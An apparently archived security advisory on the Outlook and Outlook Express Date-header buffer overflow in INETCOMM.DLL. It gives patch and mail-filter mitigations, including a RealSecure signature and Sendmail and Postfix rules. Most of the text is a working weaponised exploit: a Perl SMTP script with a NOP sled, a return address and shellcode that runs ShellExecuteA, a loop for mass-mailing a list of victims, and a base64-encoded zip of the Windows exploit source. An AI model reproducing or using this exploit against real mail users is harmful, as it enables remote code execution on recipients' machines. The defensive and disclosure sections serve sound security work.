COMMAND
Outlook
SYSTEMS AFFECTED
Outlook Express 4.0, 4.01, 5.0, 5.01, Outlook 97, 98, 2000
PROBLEM
Ussr Labs and Aaron Drew both found the same issue. A bug in a
shared component of Microsoft Outlook and Outlook Express mail
clients can allow a remote user to write arbitrary data to the
stack. This bug has been found to exist in all versions of MS
Outlook and Outlook Express on both Windows 95/98 and Windows NT
4.
The vulnerability lies in the parsing of the GMT section of the
date field in the header of an email. Bound checking on the token
representing the GMT is not properly handled. This bug can be
witnessed by opening an email with an exceptionally long string
directly preceding the GMT specification in the Date header field
such as:
Date: Fri, 13 July 2000 14:16:06
+1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
The bug lies in the shared library INETCOMM.DLL and has been
successfully exploited on Windows 95, 98 and NT with both Outlook
and Outlook Express.
The execution of this code is performed differently under each
client. Under Outlook Express, the buffer overflow occurs as
soon as the user tries to view the mail folder containing email
with a malicious date header. Under Microsoft Outlook, the
overflow occurs when attempting to preview, read, reply or
forward any email with a malicious date header. Under MS Outlook
a user may delete or save an email to disk without exploitation.
Whilst some mail transport systems seem to modify 8-bit header
data or lines over 70 characters in length preventing direct
exploitation, these restrictions seem to be avoided by encoding a
message with an exploit date field as a MIME attachment in a
Outlook's MIME attached message format. These messages also
overflow the stack when read, previewed, replied to or forwarded.
A nice little feature about this buffer overflow is that the mail
is not deleted from the server, and next time outlook is loaded,
it will try to download the mail, causing it to crash again.
To test this vulnerability USSR telneted to an SMTP server and
sent the following to themselves:
HELO
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu,13 Jun 2000 12:33:16
+1111111111111111111111111111111111111111111111111111111111111
(dot here)
QUIT
After the remote host closed the connection and sent mail to the
appropriate address, upon receipt of the mail the following fault
was generated by Outlook:
OUTLOOK caused an invalid page fault in
module <unknown> at 00de:00aedc5a.
Registers:
EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
Bytes at CS:EIP:
Stack dump:
0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054
0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131
Following code will create and send an e-mail message, that when
downloaded by outlook, will open http://www.ussrback.com.
Unix/Linux Perl Version:
http://www.ussrback.com/outoutlook.pl
Windows Console Version:
http://www.ussrback.com/outoutlook.exe
Windows Console Version Source:
http://www.ussrback.com/outoutlook.zip
Below You will find perl version and mimed Windows Console
Versions source. Perl code:
#!/usr/bin/perl
#******************************************************************************
#http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow)
# Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
#******************************************************************************
#
# By: Ussr Labs
#
# Arbitary shellcode injector over SMTP
# ./$0 -h <server hostname> -m <mail>
# ./dieoutlook.pl -h <smtp server> -m victim@address.com
#
#
#
#For Multiple email's Spanwn do something like this:
#
# for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
#
#
#
#
use Getopt::Std;
use Socket;
getopt('h:m', \%args);
# user defined variables
if(defined($args{h})){$serv=$args{h}}else{&usage;}
if(defined($args{m})){$rcpt=$args{m}}else{&usage;}
# These are the escape characters which will cause the seg violation.
# *nix didn't like the ascii interpretation, so we send the
# characters in hex.
# +,1 ,Ì ,^ ,Ð ,z , ,x
$spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a";
$shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\x81\xC4\x00" .
"\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\x0B\x11\x40\x00" .
"\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\xEB\x06\x8B\x85" .
"\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\x42\x11\x40\x00" .
"\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\x40\x00\x8D\x8D" .
"\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\x8D\x34\x11\x40" .
"\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8B" .
"\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\x50\xFF\x95\x0B" .
"\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\x11\x40\x00\x50" .
"\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\x00\x6A\x00\x8B" .
"\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\x00\x00\x00\x5D" .
"\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\x8D\xB5\x5F\x11" .
"\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\x00\x61\xC2\x10" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\xBF\x43\x72\x65" .
"\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\x65\x6C\x6C\x45" .
"\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\x6F\x64\x75\x6C" .
"\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\x6C\x6C\x33\x32" .
"\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\x72\x62\x61\x63" .
"\x6B\x2E\x63\x6F\x6D\x00";
$ret = "00aedc5a"; # return address
$nop = "\x90"; # x86 NOP
$port = 25; # default 25 SMTP port
$buffsize = "1348"; # buffer size
$buffer .= $nop x 945; # load $buffer with 945 NOP then $shellcode
$buffer .= $shellcode; # append shellcode to buffer
$offset = (hex $ret); # return hex string to corresponding value
$code = pack("N", $offset); # big-endian (long) network order
while (length $buffer < $buffsize) { $buffer .= $code; }
$buffer .= "\n\n";
print "$code\n";
# create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]
$max=(int rand 15);
@a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
@a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
@dom = ('.com', '.net', '.org');
$rdom = $dom[ rand @dom ];
$rmail = $str . "@" . $host . $dom;
print "random address set to: $rmail\n";
# random date method, format: Date: <day>, <int-day> <month> 2000 <time>
@days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
$rday = $days[ rand @days ];
$rcal=(int rand(31));
$rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
$rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
$rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
@months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
$rmonth = $months[ rand @months ];
$date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
print "date set to: $date\n";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(S, $paddr) || die("Error: $!\n");
select(S); $| = 1; select(STDOUT);
# begin our SMTP transaction
print "now starting SMTP transaction\n";
$res=<S>; print "$res\n";
print "sending HELO\n";
system("sleep 2s");
print S "HELO\r\n";
$res=<S>; print "$res\n";
print "sending MAIL FROM\n";
system("sleep 2s");
print S "MAIL FROM:$rmail\r\n";
$res=<S>; print "$res\n";
print "sending RCPT\n";
system("sleep 2s");
print S "RCPT TO:$rcpt\r\n";
$res=<S>; print "$res\n";
print "sending DATA\n";
system("sleep 2s");
print S "DATA\r\n";
$res=<S>; print "$res\n";
print "sending escape characters\n";
print S "$date";
print S " $spawn";
print "sending shellcode\n";
print S "$shellcode\r\n\r\n\r\n";
#$res=<S>; print "$res\n";
print S ".\r\n";
print S "QUIT\r\n";
print "shellcode spawn was successful\n";
close(S);
sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}
Mimed source:
---
Content-Type: application/octet-stream; name="outoutlk.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="outoutlk.zip"
Content-MD5: RKXrs6kVv/BYUtduvsKVlA==
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
-----
Even PGP plugin for MSIE (for what else too???) is vulnerable.
Trying to build a secure system using insecure components (e.g.
Windows).
SOLUTION
This vulnerability can be eliminated by taking any of the
following actions:
- Installing the patch available at
http://www.microsoft.com/windows/ie/download/critical/patch9.htm
- Performing a default installation of Internet Explorer 5.01 Service Pack 1,
http://www.microsoft.com/Windows/ie/download/ie501sp1.htm.
- Performing a default installation of Internet Explorer 5.5 on
any system except Windows 2000.
The patch requires IE 4.01 SP2 or IE 5.01 to install. Customers
who install this patch on versions other than these may receive a
message reading "This update does not need to be installed on this
system". This message is incorrect. More information is available
in KB article Q267884
Detection of this new threat with conventional tools is very
difficult. To make detection and filtering even more difficult,
some conventional methods prevent such attacks can easily be
circumvented.
Internet Security Systems RealSecure customers can use the
following procedure to detect and/or kill malicious email
traveling over SMTP:
1. From the View menu, select 'Network Sensor Policies' or
'Network Engine Policies', depending on the version of
RealSecure you are using.
2. Select your policy, and then click 'Customize...'.
3. Click the 'User Defined Events' tab.
4. Click 'Add' on the right hand side of the dialog box.
5. Type in a name for the event, such as 'Outlook Date
Overflow'.
6. In the 'Context' field, select 'Email_Content'.
7. In the 'String' field, type the following:
^Date: (.{50,50}|.*[^ -~]+)
8. You may want to configure RealSecure to kill the connection
by editing the 'Response' field to include the RSKILL
action.
9. Click 'Save', and then click 'Close'.
10. Click 'Apply to Sensor' or 'Apply to Engine', depending on
the version of RealSecure you are using.
RealSecure will now detect messages with a Date: field that is
longer than 50 characters, or if it contains any non-printable
characters (not between ASCII 0x20 and 0x7E, space, or tilde). It
is possible for this signature to false positive if there is a
line in your e-mail that starts with "date: ", and at least 50
characters or any non-printable characters or extended ASCII
characters on the same line after it. If you have a high false
positive rate, increase both numbers in the regular expression
from 50 to 70.
Here's the Sendmail filter rule to stop Outlook exploit. Also on
http://www.cetis.hvu.nl/~koos/outlookoverflow.txt
with tabs in the right places:
#
# this is a filter to make sendmail reject messages with Date: headers
# that are too long. This is used in the latest Outlook exploit.
#
# You NEED:
# - a sendmail that understands regex maps. I had to specially compile this
# into 8.11 ! Add to sendmail-8.11.0/devtools/Site/site.config.m4
# define(`confMAPDEF',`-DMAP_REGEX') and rebuild from scratch
#
# The filter simply rejects messages with a date header longer (total!)
# then 60 chars
#
# Then add this part to your .mc file in the different areas and regenerate
# your .cf file
#
# 2000-07-21 Originally written
#
# if you cut and paste this:
# tabs are in use in the '^R' lines
#
# Koos van den Hout
# http://www.cetis.hvu.nl/~koos/
# http://www.virtualbookcase.com/
#
LOCAL_CONFIG
Klinetoolong regex -a@MATCH ^.{60,}$
LOCAL_RULESETS
HDate: $>+CheckDate
SCheckDate
R$* $: $(linetoolong $1 $)
R@MATCHi $#error $: 553 Date Header too long error
R$*i $@ OK
With a little help from Koos van den Hout Mark Lastdrager made a
small header_check for Postfix to prevent people from exploiting
the latest Outlook bug. A quick test shows it works but don't
come complaining when it doesn't. In your main.cf put this line:
header_checks = regexp:/etc/postfix/header_checks
(path depends on where your postfix config lives). In
header_checks put:
/^Date:.{60,}$/ REJECT
This will reject messages with a date line longer than 60 chars.
Don't forget postfix reload.